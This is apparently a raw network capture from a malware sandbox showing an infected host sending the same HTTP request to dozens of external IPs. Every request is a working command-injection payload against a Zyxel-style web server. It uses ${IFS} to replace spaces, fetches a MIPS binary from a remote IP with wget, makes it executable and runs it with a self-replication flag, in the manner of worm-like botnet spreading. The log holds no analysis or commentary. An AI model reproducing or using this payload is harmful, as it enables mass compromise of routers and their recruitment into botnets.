                                      Jan 14, 2024 15:51:03.699896097 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8848192.168.2.145032487.195.225.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.699955940 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8849192.168.2.1446812143.114.37.22443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.699990988 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8850192.168.2.1458624183.27.22.252443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.700040102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8851192.168.2.1440020209.183.147.205443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.700088978 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8852192.168.2.1433674123.11.128.103443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.700131893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8853192.168.2.145035891.235.192.170443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.700162888 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8854192.168.2.1460096195.88.176.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.700185061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8855192.168.2.144555441.246.102.171443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.700253010 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8856192.168.2.1438484125.38.239.116443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.700292110 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8857192.168.2.144332494.238.95.151443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.700320959 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8858192.168.2.1436250190.23.5.8443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.700360060 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8859192.168.2.145703095.95.166.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.700397968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8860192.168.2.1439068152.118.22.43443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.700517893 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8861192.168.2.145314091.241.240.226443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.700541973 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8862192.168.2.145150436.128.77.125443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.700582981 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8863192.168.2.1448812159.109.116.241443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.700637102 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8864192.168.2.1453644161.67.2.73443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.700675011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8865192.168.2.1437272120.113.153.16443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.700717926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8866192.168.2.1436456136.29.95.97443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.700743914 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8867192.168.2.143420885.162.63.29443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.700781107 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8868192.168.2.146085643.148.11.161443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.700840950 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8869192.168.2.145097680.237.113.4443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.700886011 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8870192.168.2.144584877.53.143.112443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.700932026 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8871192.168.2.1441886120.110.173.54443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.700983047 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8872192.168.2.1439486130.68.36.123443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.701008081 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8873192.168.2.1449562151.234.105.163443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.701062918 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8874192.168.2.143354670.17.199.148443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.701088905 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8875192.168.2.1437674119.176.200.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.701123953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8876192.168.2.1434214186.52.14.142443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.701169968 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8877192.168.2.1449708137.15.112.138443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.701215029 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8878192.168.2.1460470116.192.40.41443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.701271057 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8879192.168.2.1440124148.181.255.25443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.701297045 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8880192.168.2.144472857.104.24.160443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.701332092 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8881192.168.2.1434204169.165.166.200443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.701379061 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8882192.168.2.1455558149.23.46.39443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.701419115 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8883192.168.2.145067674.246.102.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.701447964 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8884192.168.2.145076613.98.97.124443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.701473951 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8885192.168.2.1443548162.96.183.230443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.701525927 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8886192.168.2.1436780164.147.108.224443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.701560020 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8887192.168.2.1451314140.69.155.197443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.701612949 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8888192.168.2.144485468.177.191.227443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.701678038 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8889192.168.2.1435816128.202.63.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.701708078 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8890192.168.2.143381480.28.27.58443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.701761961 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8891192.168.2.145270670.111.163.15443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.701807022 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8892192.168.2.1437100103.175.125.222443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.701836109 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8893192.168.2.1434370170.43.51.47443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.701865911 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8894192.168.2.1437524115.168.25.48443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.701911926 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8895192.168.2.1455444153.43.86.37443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.701939106 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8896192.168.2.145424843.214.123.144443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.701999903 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8897192.168.2.1453086178.211.8.23443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.702024937 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8898192.168.2.1442888205.85.249.132443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.702081919 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8899192.168.2.145632837.230.208.175443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.702116013 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8900192.168.2.144005258.234.188.185443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.702159882 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8901192.168.2.143377663.181.226.152443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.702208042 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8902192.168.2.1459336219.225.41.129443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.702236891 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8903192.168.2.146080052.224.140.249443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.702286005 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8904192.168.2.144480652.244.79.68443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.702317953 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8905192.168.2.14369904.130.120.189443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.702364922 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8906192.168.2.1448082201.193.171.149443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.702395916 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8907192.168.2.143665224.66.161.120443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.702429056 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8908192.168.2.145567896.136.204.118443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.702495098 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8909192.168.2.1435252126.215.183.155443
                                      TimestampBytes transferredDirectionData
                                      Jan 14, 2024 15:51:03.702538967 CET212OUTGET /bin/zhttpd/${IFS}cd${IFS}/tmp;${IFS}rm${IFS}-rf${IFS}*mips*;${IFS}wget${IFS}http://103.245.236.152/skyljne.mips;${IFS}chmod${IFS}777${IFS}skyljne.mips;${IFS}./skyljne.mips${IFS}zyxel.selfrep;


                                      Session IDSource IPSource PortDestination IPDestination Port
                                      8910192.168.2.1435464163.51.100.125443
                                      TimestampBytes transferredDirectionData
